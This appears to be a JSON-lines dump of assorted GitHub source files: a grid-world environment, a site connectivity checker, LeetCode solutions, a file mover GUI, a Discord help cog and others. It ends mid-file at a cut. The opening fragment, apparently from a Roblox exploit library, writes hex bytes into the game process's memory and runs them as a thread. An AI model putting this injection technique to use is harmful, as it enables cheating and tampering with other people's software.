roblox.Program.write_bytes(NewMemAddress,bytes.fromhex(HexArray),roblox.gethexc(HexArray))\n #print(len(bytes.fromhex(HexArray)))\n print(roblox.d2h(NewMemAddress))\n roblox.Program.start_thread(NewMemAddress)\n returnValue = roblox.DRP(NewMemAddress + 0x30)\n roblox.Program.free(NewMemAddress)\n return returnValue\n\nMoveTo(playerChar)","repo_name":"ElCapor/bloxlib","sub_path":"breakjoints.py","file_name":"breakjoints.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"4373248982","text":"import numpy as np\nfrom gym import spaces\nimport gensim.downloader as api\n\nfrom mini_behavior.sampling import *\nfrom mini_behavior.envs.fixed_scene import FixedEnv\nfrom mini_behavior.objects import OBJECT_TO_IDX, IDX_TO_OBJECT\nfrom mini_behavior.grid import TILE_PIXELS\n\nfrom memsearch.graphs import NodeType, RECIPROCAL_EDGE_TYPES\n\nTILE_PIXELS = 32\n\nEDGE_TYPE_TO_FUNC = {\n \"onTop\": put_ontop,\n \"in\": put_inside,\n \"contains\": put_contains,\n \"under\": put_under,\n}\n\n\nclass SMGFixedEnv(FixedEnv):\n def __init__(self, scene_sampler, scene_evolver, encode_obs_im=False, mission_mode='one_hot', scene=None, set_goal_icon=False, env_evolve_freq=100):\n self.scene_sampler = scene_sampler\n self.scene_evolver = scene_evolver\n\n self.scene = self.scene_sampler.sample() if scene is None else scene\n self.scene_evolver.set_new_scene(self.scene)\n\n self.env_evolove_freq = env_evolve_freq\n self.node_to_obj = None\n self.moved_objs = None\n\n num_objs = self.get_num_objs()\n self.mission_mode = mission_mode\n self.encode_obs_im = encode_obs_im\n\n self.initialized = False\n self.set_goal_icon = set_goal_icon\n\n super().__init__(num_objs=num_objs, agent_view_size=7)\n\n def validate_scene(self):\n # Check scene\n all_furniture_nodes = self.scene.scene_graph.get_nodes_with_type(NodeType.FURNITURE)\n \n for fn in all_furniture_nodes:\n obj_children = [node for node in fn.get_children_nodes() if node.type == NodeType.OBJECT]\n if len(obj_children) > 4:\n return False\n return True\n \n def step(self, action):\n obs, reward, done, info = super().step(action)\n # if env_evolve_freq = -1, don't evolve env during steps, only during resets\n if self.step_count > 1 and self.env_evolove_freq != -1 and self.step_count % self.env_evolove_freq == 0:\n self.evolve()\n return obs, reward, done, info\n \n def _reward(self):\n return -1\n \n def _gen_objs(self):\n super()._gen_objs()\n if self.node_to_obj is not None:\n self.graph_to_grid()\n\n def _set_obs_space(self):\n assert self.mission_mode in ['one_hot', 'word_vec', 'int'], \"Only three modes supported: one hot, word vec or integer.\"\n \n if self.mission_mode == 'word_vec':\n self.word2vec_model = api.load(\"glove-twitter-25\")\n mission_observation_space = spaces.Box(\n low=-1,\n high=1,\n shape=(25),\n dtype='float32'\n )\n elif self.mission_mode == 'int':\n mission_observation_space = spaces.Discrete(len(IDX_TO_OBJECT))\n elif self.mission_mode == 'one_hot':\n mission_observation_space = spaces.Box(\n low=0,\n high=1,\n shape=(len(IDX_TO_OBJECT),),\n dtype='int'\n )\n else:\n assert \"need valid obs mode for mission\"\n if self.encode_obs_im: \n image_observation_space = spaces.Box(\n low=0,\n high=255,\n shape=(self.agent_view_size, self.agent_view_size, 3),\n dtype=np.uint8\n )\n else:\n image_observation_space = spaces.Box(\n low=0,\n high=255,\n shape=(self.agent_view_size * TILE_PIXELS, self.agent_view_size * TILE_PIXELS, 3),\n 
dtype=np.uint8\n )\n\n self.observation_space = spaces.Dict({\n \"direction\": spaces.Box(low=0, high=4, shape=(), dtype=np.uint8),\n 'image': image_observation_space,\n \"mission\": mission_observation_space,\n })\n \n\n def reset(self):\n # Hack around nightmare inheritance chain\n if not self.initialized:\n self._set_obs_space()\n \n # Reinitialize episode-specific variables\n self.agent_pos = (-1, -1)\n self.agent_dir = -1\n\n self.carrying = set()\n\n for obj in self.obj_instances.values():\n obj.reset()\n\n self.reward = 0\n\n # Generate a new random grid at the start of each episode\n # the same seed before calling env.reset()\n self._gen_grid(self.width, self.height)\n\n # generate furniture view\n # self.furniture_view = self.grid.render_furniture(tile_size=TILE_PIXELS, obj_instances=self.obj_instances)\n\n # These fields should be defined by _gen_grid\n assert self.agent_pos is not None\n assert self.agent_dir is not None\n\n # Check that the agent doesn't overlap with an object\n assert self.grid.is_empty(*self.agent_pos)\n\n # Step count since episode start\n self.step_count = 0\n self.episode += 1\n\n # Make node to obj list\n self.set_node_to_obj()\n # TODO not sure\n if not self.initialized:\n self.graph_to_grid()\n self.initialized = True\n #TODO: Set the mission THIS IS RANDOM AND NEEDS TO GET FIXED\n self.set_random_mission()\n\n # Return first observation\n obs = self.gen_obs()\n\n self.reward = 0\n self.step_count = 0\n self.episode += 1\n\n if self.node_to_obj is not None:\n self.evolve()\n\n return obs\n\n def get_num_objs(self):\n num_objs = {}\n\n for node in self.scene.scene_graph.get_nodes_with_type(NodeType.FURNITURE) + self.scene.scene_graph.get_nodes_with_type(NodeType.OBJECT):\n num_objs[node.label] = num_objs.get(node.label, 0) + 1\n\n return num_objs\n\n def set_node_to_obj(self):\n \"\"\"\n returns dict: key = node, value = obj_instance\n \"\"\"\n self.node_to_obj = {}\n\n for obj_type, objs in self.objs.items():\n nodes = self.scene.scene_graph.get_nodes_with_label(obj_type)\n\n assert len(objs) == len(nodes)\n for i in range(len(objs)):\n self.node_to_obj[nodes[i]] = objs[i]\n\n def graph_to_grid(self):\n \"\"\"\n NOTE: each edge obj has 1 parent node, and there are two edges between\n \"\"\"\n # for every furniture\n for furniture_node in self.scene.scene_graph.get_nodes_with_type(NodeType.FURNITURE):\n furniture = self.node_to_obj[furniture_node]\n # for every obj related to the furniture\n for obj_node in furniture_node.get_children_nodes():\n if obj_node.type == NodeType.OBJECT:\n obj = self.node_to_obj[obj_node]\n edges = obj_node.get_edges_to_me()\n if len(edges) > 0:\n edge = edges[0] # edge from obj to furniture\n assert edge.node2 == obj_node and edge.node1 == furniture_node\n EDGE_TYPE_TO_FUNC[RECIPROCAL_EDGE_TYPES[edge.type].value](self, obj, furniture) # put the obj on the grid\n else:\n print(\"Found 0 length edges\")\n\n def sample_to_grid(self, obj_node):\n if obj_node.type == NodeType.OBJECT:\n obj = self.node_to_obj[obj_node]\n if obj.cur_pos is not None and not obj.check_abs_state(state='inhandofrobot'):\n self.grid.remove(*obj.cur_pos, obj)\n\n edge = \\\n [e for e in obj_node.edges if (e.node1.type == NodeType.FURNITURE or e.node2.type == NodeType.FURNITURE)][0]\n\n if edge.node1.type == NodeType.FURNITURE:\n furniture_node = edge.node1\n edge_type = RECIPROCAL_EDGE_TYPES[edge.type]\n else:\n furniture_node = edge.node2\n edge_type = edge.type\n\n furniture = self.node_to_obj[furniture_node]\n EDGE_TYPE_TO_FUNC[edge_type.value](self, 
obj, furniture) # put the obj on the grid\n\n # uncomment for debugging\n # check_state(self, obj, furniture, edge_type)\n\n def evolve(self):\n # self.scene_evolver.scene = self.scene\n self.moved_objs = self.scene_evolver.evolve() # list of objects that were moved\n for obj_node in self.moved_objs:\n if obj_node not in list(self.node_to_obj.keys()): # if it is an added obj\n obj_instance = self.add_objs({obj_node.label: 1})[0]\n node_to_obj = self.node_to_obj\n node_to_obj[obj_node] = obj_instance\n self.node_to_obj = node_to_obj\n assert obj_node in list(self.node_to_obj.keys())\n self.sample_to_grid(obj_node)\n\n def _end_conditions(self):\n assert self.target_poses, \"This function should only be called after set_mission\"\n for target_pos in self.target_poses:\n if np.all(target_pos == self.front_pos) or self.step_count == self.max_steps:\n return True\n return False\n\n def set_mission(self, goal):\n \"\"\"\n Sets the mission of the env\n \"\"\"\n assert isinstance(goal, int) or isinstance(goal, str), \"Expecting either obj index or obj name\"\n \n if isinstance(goal, int): # Setting target by obj idx\n obj_label = IDX_TO_OBJECT[goal]\n obj_idx = goal\n elif isinstance(goal, str):\n obj_label = goal.lower()\n obj_idx = OBJECT_TO_IDX[obj_label]\n self.goal_obj_label = obj_label\n \n assert obj_label in self.objs.keys(), \"Goal object not sampled in current scene.\"\n self.target_poses = [target_obj.cur_pos for target_obj in self.objs[obj_label]]\n \n # Set mission\n if self.mission_mode == 'one_hot':\n self.mission = np.eye(len(IDX_TO_OBJECT))[obj_idx]\n elif self.mission_mode == 'int':\n self.mission = obj_idx\n elif self.mission_mode == 'word_vec':\n model_inps = obj_label.split('_')\n vec = np.zeros((25))\n for inp in model_inps:\n vec += self.word2vec_model.get_vector(inp, norm=True)\n vec /= len(model_inps)\n self.mission = vec\n else:\n assert \"Missing obs mode\"\n \n if self.set_goal_icon: # Set icon of goal object to be green\n goal_objs = self.objs[obj_label]\n for goal_obj in goal_objs:\n goal_obj.icon_color = 'green'\n \n def get_possible_missions(self):\n all_object_nodes = self.scene.scene_graph.get_nodes_with_type(NodeType.OBJECT)\n all_obj_labels = [self.node_to_obj[node].type for node in all_object_nodes]\n return all_obj_labels\n \n def set_random_mission(self):\n all_goals = self.get_possible_missions()\n random_goal = random.choice(all_goals)\n self.set_mission(random_goal)\n \n def set_mission_by_node(self, node):\n self.goal_node = node \n self.goal_obj_label = self.node_to_obj[node].type\n self.set_mission(self.goal_obj_label)\n","repo_name":"andreykurenkov/modeling_env_dynamics","sub_path":"memsearch/igridson_env.py","file_name":"igridson_env.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"14388057108","text":"import urllib.request as urllib\n\n\nprint(\"This is a site connectivity checker program.\")\ninput_url = input(\"Input the url of the site: \")\n \ndef main(url):\n responce = urllib.urlopen(url)\n print(\"The response code is: \", responce.getcode())\n \nmain(input_url)","repo_name":"Tharindu-Dasantha/CS","sub_path":"projects/20_projects/site_connectivity_checker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23459813199","text":"class Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: 
List[int]\n :rtype: List[int]\n \"\"\"\n en = 1\n for i in range(len(digits)-1, -1, -1):\n temp = digits[i] + en\n if temp < 10:\n digits[i] = temp\n return digits\n else:\n digits[i] = temp - 10\n return [1] + digits\n","repo_name":"ynyeh0221/LeetCode-II","sub_path":"66. Plus One.py","file_name":"66. Plus One.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7767501739","text":"import os\nimport sys\nfrom Naked.toolshed.shell import execute_js, muterun_js\nimport time\n\nfrom python_utils.IOUtils import *\n\nif os.path.exists(save_file):\n pdf_list = loadProcessingState()\n print(\"loading previous processing state: \")\nelse:\n folder = sys.argv[1]\n\n # safeguarding foldername\n if folder[-1] != '/':\n folder = folder + '/'\n\n pdf_list = os.listdir(folder)\n pdf_list = [folder + pdf for pdf in pdf_list]\n pdf_list = filterBySize(pdf_list)\n pdf_list = list(pdf_list)\n\n saveProcessingState(pdf_list)\n\nprint(\"list of pdfs to process: \")\nprint(pdf_list)\nprint(\"in total: \")\nprint(len(pdf_list))\n\ncmd_head = \"converter.js \"\n\nwhile len(pdf_list) != 0:\n pdf = pdf_list.pop(0)\n\n cmd = cmd_head + pdf\n output = execute_js(cmd)\n print(output)\n\n # save the status after each process\n saveProcessingState(pdf_list)\n\n# remove the state file to complete processing\nos.remove(save_file)\n","repo_name":"homosapien-lcy/turbo_write_app_and_database","sub_path":"pdf-to-text_diy/converterCallerJS.py","file_name":"converterCallerJS.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17744520833","text":"#code by: Bethina Dileep\ndef convert_peeks_valleys(arr):\n n = len(arr)\n for i in range(0,n,2):\n if i>0 and arr[i] 0:\n #此处计算的是右胳膊\n angle = detector.computeAngle(img,12,14,16)\n #线性插值\n per = np.interp(angle,(210,310),(0,100))\n if per == 100:\n if dir == 0:\n count += 0.5\n dir = 1\n if per == 0:\n if dir == 1:\n count += 0.5\n dir = 0\n bgsound.play()\n cv2.putText(img,str(int(count)),(45,450),cv2.FONT_HERSHEY_PLAIN,5,(0,0,222),8)\n cv2.imshow(\"\",img)\n cv2.waitKey(1)\ncap.release()","repo_name":"chu-ci/work","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14439761771","text":"import os\n\n\nEMAIL_BACKEND = \"django_ses.SESBackend\"\n\nUSE_SES_V2 = True\nAWS_SES_ACCESS_KEY_ID = os.environ.get(\"AWS_SES_ACCESS_KEY_ID\")\nAWS_SES_SECRET_ACCESS_KEY = os.environ.get(\"AWS_SES_SECRET_ACCESS_KEY\")\nAWS_SES_REGION_NAME = os.environ.get(\"AWS_SES_REGION_NAME\", \"eu-central-1\")\nAWS_SES_REGION_ENDPOINT = f\"email.{AWS_SES_REGION_NAME}.amazonaws.com\"\nAWS_SES_FROM_EMAIL = os.environ.get(\"AWS_SES_FROM_EMAIL\")\n\n# EMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = os.environ.get(\"EMAIL_HOST\")\n# EMAIL_PORT = os.environ.get(\"EMAIL_PORT\")\n# EMAIL_HOST_USER = os.environ.get(\"EMAIL_HOST_USER\")\n# EMAIL_HOST_PASSWORD = os.environ.get(\"EMAIL_HOST_PASSWORD\")\n# DEFAULT_FROM_EMAIL = \"noreply@example.com\"\n","repo_name":"ondrados/django-boilerplate","sub_path":"src/app/settings/components/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"23506519579","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\narr = [x for x in range(n+1)]\ndic = dict()\nfor x in range(n+1):\n dic[x] = [x]\n\nfor _ in range(m):\n t, x, y = map(int, input().split())\n\n if t == 0:\n if x != y and arr[x] != arr[y]:\n temp = dic.pop(arr[y])\n dic[arr[x]] += temp\n for i in temp:\n arr[i] = arr[x]\n else:\n if arr[y] == arr[x]:\n print(\"YES\")\n else:\n print(\"NO\")","repo_name":"nkrang/Algorithm-Study","sub_path":"202111/B-1717/집합의_표현_시간초과.py","file_name":"집합의_표현_시간초과.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11631651768","text":"#!/usr/bin/env python3\n#\n#Application to move files from one directory to another.\n#\n#Run in terminal with :\n#\n# python3 mover.py\n# /.mover.py\n#\n\nimport os\nimport glob\nimport shutil\nimport errno\n\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom sys import platform\nfrom tkinter import *\n\nclass MainWindow(Frame):\n \"\"\"Initilizes the class MainWindow for tkinter GUI.\n\n Args:\n master (str): Defines parent widget if any.\n \"\"\"\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.__init__window()\n\n # Creates the window for user interaction.\n def __init__window(self):\n \"\"\"Creates the GUI window based on grid system in tkinter.\"\"\"\n self.master.title(\"Mover\")\n self.pack(fill=BOTH, expand=1)\n\n # Get source and destination directory with file extension to move.\n Label(self, text=\"Source:\").grid(row=0)\n Label(self, text=\"Destination:\").grid(row=1)\n Label(self, text=\"Extension:\").grid(row=2)\n\n # Allow user input or browse with button for source/destination location.\n self.entry1 = Entry(self)\n self.entry2 = Entry(self)\n self.entry3 = Entry(self)\n self.entry1.grid(row=0, column=1)\n self.entry2.grid(row=1, column=1)\n self.entry3.grid(row=2, column=1)\n\n #Buttons on GUI.\n browseButton = Button(self, text=\"Browse\", command=self.loadSource)\n browseButton1 = Button(self, text=\"Browse\", command=self.loadDest)\n applyButton = Button(self, text=\"Apply\", command=self.moveFile)\n browseButton.grid(row=0, column=2, padx=5, pady=5)\n browseButton1.grid(row=1, column=2, padx=5, pady=5)\n applyButton.grid(row=3, column=1, padx=5, pady=5)\n\n def exit(self):\n \"\"\"Exits program.\"\"\"\n exit()\n\n def loadSource(self):\n \"\"\"Loads source directory using tkinter filedialog.\"\"\"\n cwd = filedialog.askdirectory()\n self.entry1.delete(0, END)\n self.entry1.insert(0, cwd)\n\n def loadDest(self):\n \"\"\"Loads destination directory using tkinter filedialog.\"\"\"\n dest = filedialog.askdirectory()\n self.entry2.delete(0, END)\n self.entry2.insert(0, dest)\n\n def moveFile(self):\n \"\"\"Move files with the source and destination defined by user.\n \n Raises:\n shutilError: If file already exists in destination folder.\n \"\"\"\n expression = self.entry3.get()\n file_list = []\n\n # Catch exceptions if shutil has errors.\n try:\n for ext in expression.split(\",\"):\n for file in glob.glob(self.entry1.get() + \"/*.\" + ext):\n file_list.append(file)\n file_name = os.path.basename(file)\n if(os.path.exists(self.entry2.get() + \"/\" + file_name)):\n results = self.owConfirm(file_name)\n if(results):\n shutil.copy(file, self.entry2.get())\n os.remove(file)\n else:\n shutil.move(file, self.entry2.get())\n except shutil.Error as err:\n self.errorWindow(err)\n pass\n\n 
self.listWindow(file_list)\n\n #New window to show all moved files.\n def listWindow(self, files):\n \"\"\"Creates new window that lists all files moved.\n\n Args:\n files (:obj:`list` of :obj:`str`): List of all files moved.\n\n \"\"\"\n list = '\\n'.join(files)\n messagebox.showinfo(\"Moved Files\", list)\n\n def errorWindow(self, text):\n \"\"\"Creates new window that shows description of error.\n\n Args:\n text (str): Description of error occurrence.\n\n \"\"\"\n messagebox.showerror(\"Error\", text)\n\n def owConfirm(self, text):\n \"\"\"Window that appears to allow the user to decide whether to overwrite an existing file.\n\n Args:\n text (str): File name.\n\n Returns:\n bool: Return value based on user choice. Yes for true. No for false.\n\n \"\"\"\n return messagebox.askyesno(\"Overwrite File\", text + \" exists in destination directory. Overwrite?\")\n\n#Main\nroot = Tk()\n\nif platform == 'darwin' or platform == 'linux':\n root.geometry(\"350x150\")\nelif platform == 'win32':\n root.geometry(\"250x130\")\n\nroot.resizable(width=False, height=False)\napp = MainWindow(root)\nroot.mainloop()\n","repo_name":"allenlam465/mover","sub_path":"mover.py","file_name":"mover.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8963521553","text":"import asyncio\nimport math\nimport sys\n\nimport discord\nfrom discord.ext import commands\n\nfrom help_def import hyojun_help\n\nsys.path.append(\"../\")\n\n\nclass ManageHelp(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command(name=\"help\")\n    @commands.bot_has_permissions(add_reactions=True, manage_messages=True)\n    async def _help(self, ctx):\n        \"\"\"ヘルプを送信\"\"\"\n        if isinstance(ctx.channel, discord.DMChannel):  # dmだったらreturn\n            return\n\n        def page_setup(page: int) -> discord.Embed:\n            \"\"\"ページ数に対応したhelp内容をセット\"\"\"\n            help_embed = discord.Embed(title=f\"標準のhelp {page}/{max_page}\", description=\"\")\n            for i in range(5):\n                n = 5 * page - 5 + i\n                try:\n                    help_embed.add_field(\n                        name=hyojun_help[n][\"name\"],\n                        value=f'{hyojun_help[n][\"value\"]}\\n{sen}',\n                        inline=False)\n                except IndexError:\n                    break\n            return help_embed\n\n        react_list = [\n            \"\\N{DIGIT ONE}\\N{COMBINING ENCLOSING KEYCAP}\",  # 1\n            \"\\N{DIGIT TWO}\\N{COMBINING ENCLOSING KEYCAP}\",  # 2\n            \"\\N{DIGIT THREE}\\N{COMBINING ENCLOSING KEYCAP}\",  # 3\n            \"\\N{DIGIT FOUR}\\N{COMBINING ENCLOSING KEYCAP}\",  # 4\n            \"\\N{DIGIT FIVE}\\N{COMBINING ENCLOSING KEYCAP}\",  # 5\n            \"\\N{BLACK LEFT-POINTING TRIANGLE}\",  # 戻る\n            \"\\N{BLACK RIGHT-POINTING TRIANGLE}\",  # 進む\n            \"\\N{BLACK SQUARE FOR STOP}\\N{VARIATION SELECTOR-16}\"]  # stop\n\n        num_list = [\"\\N{DIGIT ONE}\\N{COMBINING ENCLOSING KEYCAP}\",\n                    \"\\N{DIGIT TWO}\\N{COMBINING ENCLOSING KEYCAP}\",\n                    \"\\N{DIGIT THREE}\\N{COMBINING ENCLOSING KEYCAP}\",\n                    \"\\N{DIGIT FOUR}\\N{COMBINING ENCLOSING KEYCAP}\",\n                    \"\\N{DIGIT FIVE}\\N{COMBINING ENCLOSING KEYCAP}\"]\n\n        sen = \"-------\"\n        no_img = \"https://cdn.discordapp.com/attachments/688401587823050787/688401606512869376/YhyUGSJ0vEEZnh33jDHaqhYiB6f5erABoMcJu2bdv-mwkS08Syf29Kefr50kdGcpVjADOjNLgzFiZYJ_Nn6FGmmTMSWWAG78cPWG.png\"\n\n        help_count = len(hyojun_help)  # ヘルプの数を出す\n        max_page = math.ceil(help_count / 5)  # 5で割って何ページになるか測定.小数点は繰り上げ\n\n        page = 1\n        msg = await ctx.send(embed=page_setup(page))\n\n        for react in react_list:\n            await msg.add_reaction(react)  # リアクション付与\n\n        def check(reaction, user):\n            if reaction.message.id != msg.id:\n                return False\n            elif ctx.author.bot or user != ctx.author:\n                
return False\n            elif str(reaction.emoji) in react_list:\n                return reaction, user\n            else:\n                return False\n\n        while not self.bot.is_closed():\n            try:\n                react, user = await self.bot.wait_for(\"reaction_add\", check=check, timeout=300)\n            except asyncio.TimeoutError:\n                await ctx.message.clear_reactions()\n                break\n            else:\n                try:\n                    emoji = str(react.emoji)\n                    await msg.remove_reaction(emoji, user)\n                    if emoji in num_list:  # 数字のリアクションが付いたら\n                        embed = page_setup(page)\n                        num = 5 * page - 5 + react_list.index(emoji)\n                        embed.add_field(\n                            name=\"Info\",\n                            value=hyojun_help[num][\"info\"])\n                        if hyojun_help[num][\"image\"] == \"None\":  # コマンドの画像を追加\n                            embed.set_image(url=no_img)\n                        else:\n                            embed.set_image(url=hyojun_help[num][\"image\"])\n\n                        await msg.edit(embed=embed)\n\n                    if emoji == u\"\\u25C0\" or emoji == u\"\\u25B6\":  # 進むか戻るリアクションだったら\n                        if emoji == u\"\\u25C0\":  # 戻るリアクションだったら\n                            if page == 1:\n                                page = max_page\n                            else:\n                                page -= 1\n\n                        if emoji == u\"\\u25B6\":  # 進むリアクションだったら\n                            if page == max_page:\n                                page = 1\n                            else:\n                                page += 1\n\n                        await msg.edit(embed=page_setup(page))\n\n                    if emoji == \"\\N{BLACK SQUARE FOR STOP}\\N{VARIATION SELECTOR-16}\":  # 削除のリアクションだったら\n                        await msg.delete()\n                except IndexError:\n                    await ctx.send(\"範囲外のリアクションが押されました\", delete_after=3.0)\n                    continue\n\n\ndef setup(bot):\n    bot.add_cog(ManageHelp(bot))\n","repo_name":"Budobudou/2rz-bot","sub_path":"cogs/commands/manage_help.py","file_name":"manage_help.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"42845577955","text":"def nomeMes(mes):\n    i=0\n    resposta = None\n    lista = ['janeiro', 'fevereiro', 'março', 'abril', 'maio', 'junho', 'julho', 'agosto', 'setembro', 'outubro', 'novembro', 'dezembro']\n    while i < len(lista):\n        if mes == lista[i]:\n            resposta=i+1\n        i+=1\n    return resposta\nmes=str(input('nome do mês: '))\nprint(nomeMes(mes))\n\n    ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_238/ch48_2019_03_22_11_56_31_569271.py","file_name":"ch48_2019_03_22_11_56_31_569271.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72533751094","text":"\nimport random\n\nwhile True:\n    \n    print('Welcome to the Amazing 8 Ball')\n\n    predictions = ['It is certain!', 'As I see it, YES!', 'Most Likely!', 'Ask again later!', 'My reply is NO!']\n\n    question = input('Ask me any question your HeART DesirEs...')\n\n    random_prediction = random.choice(predictions)\n\n    print('Searching my MaGiC GLoBe...')\n\n    print(random_prediction)\n\n    question = input('Would you like to ask another question?!? 
yes or no')\n\n valid_yes = ['yes']\n valid_no = ['no']\n valid_choices = valid_yes + valid_no\n\n while question not in valid_choices:\n print(f'You chose an invalid selection: {question}')\n question = input('Ask another question, or type Done to exit')\n\n if question in valid_no:\n print('Goodbye!')\n break\n\n elif question in valid_yes:\n print('Next Question, Please!') ","repo_name":"lisamonique/-PDX-Code-Guild---Python-Fullstack-Solutions-.","sub_path":"Labs/Lab_04_Magic_8_Ball.py","file_name":"Lab_04_Magic_8_Ball.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1659291926","text":"import copy\nimport sys\n\ninput = sys.stdin.readline\n\nMIIS = lambda: map(int, input().split())\n\nN, HP = MIIS()\nskills = {}\n\nfor i in range(N):\n C, D = MIIS()\n skills[i] = (C, D)\n\nans = 10000000\nans_history = ''\n\ndef dfs(seconds: int, HP: int, skill_wait: list, history:str): # history는 디버깅용으로 만들었다.\n global ans, ans_history\n\n # 이미 정답 아니면\n if seconds >= ans:\n return\n\n # 몬스터 처치 했으면\n if HP <= 0:\n # 몬스터 처치하는 데 최소 시간\n ans = seconds\n ans_history = history\n return\n\n\n for i in range(N):\n new_skill_wait = copy.copy(skill_wait)\n tmp = new_skill_wait[i]\n if tmp < 0:\n tmp = 0\n # tmp+1초만큼 이동할 것\n tmp += 1\n\n for j in range(N):\n new_skill_wait[j] -= tmp\n # 스킬 사용하기\n new_skill_wait[i] = skills[i][0]-1\n\n dfs(seconds + tmp, HP - skills[i][1], new_skill_wait, history+f'{seconds}초: 스킬{i} |')\n\n\ndfs(0, HP, [0] * N, '')\nprint(ans)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"김서인/2111/211111/20008.py","file_name":"20008.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18404937359","text":"import itertools; import math; import operator; import random; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce, lru_cache; from heapq import *; import unittest; from typing import List;\ndef get_sol(): return Solution()\nclass Solution:\n # https://leetcode.com/problems/maximum-number-of-points-with-cost/discuss/1344908/Python-3-DP-Explanation-with-pictures.\n def maxPoints(self, points: List[List[int]]) -> int:\n m,n=len(points),len(points[0])\n dp=[[-1]*n for _ in range(m)]\n for j in range(n):\n dp[0][j]=points[0][j]\n for i in range(1,m):\n left=[0 for _ in range(n)]\n right=[0 for _ in range(n)]\n for j in range(n):\n if j==0:\n left[j]=dp[i-1][j]\n else:\n left[j]=max(left[j-1]-1,dp[i-1][j])\n for j in reversed(range(n)):\n if j==n-1:\n right[j]=dp[i-1][j]\n else:\n right[j]=max(right[j+1]-1,dp[i-1][j])\n for j in range(n):\n dp[i][j]=points[i][j]+ max(left[j],right[j])\n return max(dp[-1])\n\nclass tester(unittest.TestCase):\n def test_1(self):\n points = [[1,2,3],[1,5,1],[3,1,1]]\n Output= 9\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_2(self):\n points = [[1,5],[2,3],[4,2]]\n Output= 11\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_3(self):\n points = [[1,5,7,9]]\n Output= 9\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_4(self):\n points = [[1],[5],[7],[9]]\n Output= 22\n self.assertEqual(Output,get_sol().maxPoints(points))\n def test_5(self):\n points = [[0,3,0,4,2],[5,4,2,4,1],[5,0,0,5,1],[2,0,1,0,3]]\n Output= 15\n self.assertEqual(Output,get_sol().maxPoints(points))\n # def test_6(self):\n # def 
test_7(self):","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc1937.py","file_name":"lc1937.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2198257548","text":"#libraries\nimport hashlib #sha256 for content hashing\n\n#own files\nimport packet, constant\n\n#common base class for OutgoingFile and IncomingFile\nclass ProtoFile:\n\t# number, string, number, number\n\tdef __init__(self, file_type, file_name, file_size, time_to_live):\n\t\tself.type = file_type\n\t\tself.name = file_name\n\t\tself.size = file_size\n\t\tself.ttl = time_to_live\n\n\t\tchunks_amount = file_size / packet.FILE_CHUNK_SIZE\n\t\tif file_size % packet.FILE_CHUNK_SIZE > 0: chunks_amount += 1\n\t\tself.chunks = [None] * chunks_amount #array filled with chunks_amount of Nones\n\n\t\tself.path = None #disk file name; will be different from self.name in case there already exists a file named self.name\n\t\tself.handle = None #file handle, for disk i/o\n\t\t\n\t\tself.hash = None #if OutgoingFile, this is the correct hash. if IncomingFile, this is the purported hash from the sender\n\t\t\n\n\t#sha 256 hash of the contents of the file, if all the chunks are present\n\tdef compute_content_hash(self):\n\t\thash_ob = hashlib.sha256()\n\t\tfor chunk in self.chunks:\n\t\t\tassert chunk is not None\n\t\t\thash_ob.update(chunk)\n\n\t\treturn hash_ob.digest()\n\n\n\t#@(hash): , for a common template\n\tdef message(self, string):\n\t\tconstant.time_print(\"@\" + self.name + ' {' + self.hash.encode('hex') + \"}:\\n\\t\" + string)\n\n\n","repo_name":"pyrolitic/telecoms_multicast","sub_path":"proto_file.py","file_name":"proto_file.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3552941720","text":"parrot = \"Norweigian blue\"\n\nletter = input(\"enter a character: \")\n\n# checking to see if a letter is in 